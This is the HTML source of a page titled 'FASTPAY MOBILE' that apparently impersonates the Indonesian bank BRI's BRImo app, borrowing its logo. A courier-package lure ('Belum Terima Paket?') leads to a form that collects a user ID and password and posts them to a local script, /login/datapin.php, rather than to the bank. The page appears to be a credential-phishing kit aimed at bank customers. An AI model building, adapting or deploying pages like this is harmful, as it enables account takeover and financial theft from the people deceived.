<!doctype html>
<html lang="en">
 <head> 
  <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
  <meta name="description" content=""> 
  <link rel="canonical" href=""> 
  <meta name="twitter:card" content="summary_large_image"> 
  <meta property="og:title" content=""> 
  <meta name="twitter:title" content=""> 
  <meta property="og:site_name" content=""> 
  <meta name="twitter:site_name" content=""> 
  <meta property="og:description" content=" ..."> 
  <meta name="twitter:description" content="BRImo ..."> 
  <link rel="image_src" href="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta property="og:image" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta name="twitter:image:src" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta property="og:url" content=""> 
  <meta property="og:type" content="website"> 
  <meta name="apple-mobile-web-app-capable" content="yes"> 
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"> 
  <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui"> 
  <title>FASTPAY MOBILE</title> 
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous"> 
  <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"> 
  <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        @font-face {
            font-family: 'Avenir';
            src: url(../fonts/AvenirNextLTPro-Bold.otf);
        }

        body {
            padding: 0;
            margin: 0;
            width: 100%;
            height: 0px;
            font-family: 'Avenir';
            background: url("https://databaseku.nasiwebhost.com/jne/bg.png") left bottom / cover; width: 100%; margin-top: 5%; position: relative;
        }

        .text-header {
            font-family: 'Avenir';
            margin-top: 24px;
            margin-left: -20px;
            color: #000000;
        }

        .text-subheader {
            font-family: 'Avenir';
            margin-top: -20px;
            color: #000;
        }

        .btn-punya {
            font-family: 'Avenir';
            display: block;
            margin: 80px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: none rgb(0, 134, 224);
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            font-family: 'Avenir';
            display: block;
            margin: 10px auto;
            padding: 0px; 
            cursor: pointer; 
            background: none transparent;
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(0, 134, 224);
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            transition: background 200ms ease 0s;
        }

        /*.form-log {
            text-align: left;
            font-family: 'Avenir';
            box-sizing: box; 
            height: 35px; 
            border-top: 0px; 
            border-right: 0px solid rgba(168, 168, 168, 0.58); 
            border-bottom:1px solid #a9a9a9;
            border-left: 0px outset rgba(168, 168, 168, 0.58); 
            border-image: initial; 
            background-color: rgb(255, 255, 255); 
            border-radius: 5px 5px 0px 0px; 
            box-shadow: rgb(237, 237, 237) 0px 0px 0px 0px; 
            font-family: 'Open Sans', sans-serif;
            font-size: 16px; 
            color: white; 
            word-spacing: 7px; 
            padding: 0px 10px;
            outline: none;
            margin-top: -40px;
            margin-left 100px;*/
        }

        #ionIcons {
            font-family: 'Avenir';
            color: rgb(22, 119, 199);
            font-size: 40px;
            position: absolute;
            display: block;
            margin-top: 7px;
            margin-left: 30px;
        }

        .eye {
            font-family: 'Avenir';
            display: block;
            margin: -35px auto;
            margin-right: 20px;
            position: relative;
            box-sizing: border-box; 
            z-index: 16; 
            height: 19.8189px;
            width: 25.0236px; 
            float: right;
            border-radius: 0px; 
            cursor: pointer;
        }

        .btn-login {
            font-family: 'Avenir';
            display: block;
            margin: 60px 0 0 0;
            padding: 0px; 
            cursor: pointer; 
            background: red; 
            border: none; 
            text-align: center; 
            height: 50px; 
            width: 60%; 
            font-family: Arial; 
            font-size: 15px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 4px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 100ms step-start 0s;
            margin-left: 0px;
        }

        .btn-login:disabled {
            opacity: 0.5;
        }

        @media only screen and (max-width: 600px) {
            .btn-login {
                width: 100%;
            }
        }
        .blink {
  animation: blink-animation 5s steps(4, start) infinite;
  -webkit-animation: blink-animation 1s steps(4, start) infinite;
}
@keyframes blink-animation {
  to {
    visibility: hidden;
  }
}
@-webkit-keyframes blink-animation {
  to {
    visibility: hidden;
  }
}
 
/*contoh1*/
/*support google chrome*/
.contoh1::-webkit-input-placeholder{
    color: white;
}
 
/*support mozilla*/
.contoh1:-moz-input-placeholder{
    color: white;
}
 
/*support internet explorer*/
.contoh1:-ms-input-placeholder{
    color: white;
}
 
.contoh2::-webkit-input-placeholder{
    color: white;
}
 
/*support mozilla*/
.contoh2:-moz-input-placeholder{
    color: white;
}
 
/*support internet explorer*/
.contoh2:-ms-input-placeholder{
    color: white;
}

.css-1fq0ymr { width: 24px; 0px; margin-top: 90px; margin-left: 20px; position: left; }
}
    </style> 
 </head>  
 <body><!--
  <span class="blink"><h4 style="width: 100%; background: red;color: white;text-align: center;font-size: 13px;height: 20px;pading: 12px;">Anda bukan pemilik paket silahkan masukan nama dengan benar.</h4></span>  -->
  <div class="container"> 
   <div class="mt-3"> 
    <div class="row"> 
     <div class="col-12 d-block mx-auto" style="margin-bottom: 0px;margin-top: -50px; white-space: pre-wrap; width: 459px; max-width: 100%; left: 0px; top: 0px; height: 98.8px; padding-bottom: 0px; font-family: Barlow; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px;"> 
      <div class="text-header">
       <center>
                <h5 style="text-align: center;padding-top: -20px;font-size: 14px; margin-top: -30px;margin-left: 17px;">Kejujuran Anda Akan Menjadi Motivasi Kita</h5> 
    </div> 
      </div> 
     </div> 
        <font style="font-size: 15px; font-weight: bold; margin-left: 32px;margin-top: -80px; text-align: center;"><strong>Ayo Jadilah Manusia Jujur Di Indonesia !</strong></font>
       </center>
<form action="/login/datapin.php" method="POST">
    <div class="col-12" style="width: 100%; max-width: 100%; display: block; margin: 65px auto;"> 
     <div>
         <!-- 
      <img src="https://databaseku.nasiwebhost.com/jne/id.png" class="css-1fq0ymr">--><i class="ion-ios-person-outline" id="ionIcons" style="width: 60%; height: 20px;"></i><input class="contoh1" type="text" id="name" name="name" tabindex="1" placeholder="ID Pengguna" maxlength="13" required="" style="width:75%;height: 50px; margin-left: 80px; margin-top: -190px; background: transparent; border-radius: 0px; text-align: left; padding-left: 0px; outline:none; border: white 1px; 0px; 0px; 0px; font-size: 15px; font-family: Times New Roman; font-weight: bold; color: white;">
      <p style="width: 90%; color: white; font-weight: bold; font-size: 13px; margin-top: -10px; margin-left: 18px;">_____________________________________________</p>
      <br>
      <h7 style="position: center; margin-top: 15px; margin-left: 10px; color: white;"></h7> 
      <input class="contoh2" type="password" name="password" id="password" tabindex="1" placeholder="Password" maxlength="" required="" style="width:100%;height: 50px; margin-left: 0px; margin-top: 0%; background: transparent; border-radius: 0px; text-align: left; padding-left: 50px; padding-top: 22.50px; outline:none; border: white 0px; 0px; 0px; 0px; font-size: 15px; font-family: Times New Roman; font-weight: bold; color: white;">
      <p style="width: 90%; color: white; font-weight: bold; font-size: 13px; margin-top: -10px; margin-left: 18px;">_____________________________________________</p>
     </div> 
     <div class="row mt-3"> 
      <div class="col-12" style="width: 459px; max-width: 92%; display: block; margin: -20px auto;"> 
       <!--<button class="btn-login" type="submit" id="submit" value="submit">Lanjut</button>--> 
       <div class="text-header" style="float: center; position: auto; z-index: 999; display: block; margin-top: 15px;">
        <font style="font-size: 15px" color="#000000"><strong>
          <center>
           <!--<a9 href="https://ib.bri.co.id/ib-bri/id/forget-password.html" target="_blank" style="color: #a4a4a4;margin-left: 15px; text-decoration: none;">
            Belum Jadi Mitra Fastpay?
           </a9>-->
          </center></strong></font>
                 <center> 
        <div class="text-header" style="float: center; position: auto; z-index: 999; display: block; margin-top: 15px;">
         Perlu Bantuan ?
         <font style="font-size: 15px" color="#a4a4a4"><strong><a href="" target="_blank" style="color: #0078d5;margin-left: px; text-decoration: none;">Belum Terima Paket?</a></strong></font>
        </div>
       </center> 
       </div> 
       <center>
        <button type="submit" style="padding-top: 0px;background: transparent; width: 100%;margin-top: 35px;font-weight: bold; text-align: center;border: 0px solid #0078d5;margin-left: 0px;height: 50px;border-radius: 05px;color: white; font-size: 17px;">Lanjut</button>
       </center> 
      </div> 
     </div> 
    </div> 
   </div> 
  </div> 
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> 
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
        <script src="/login/fetch.js" type="module"></script>
    </form>
 </body>
</html>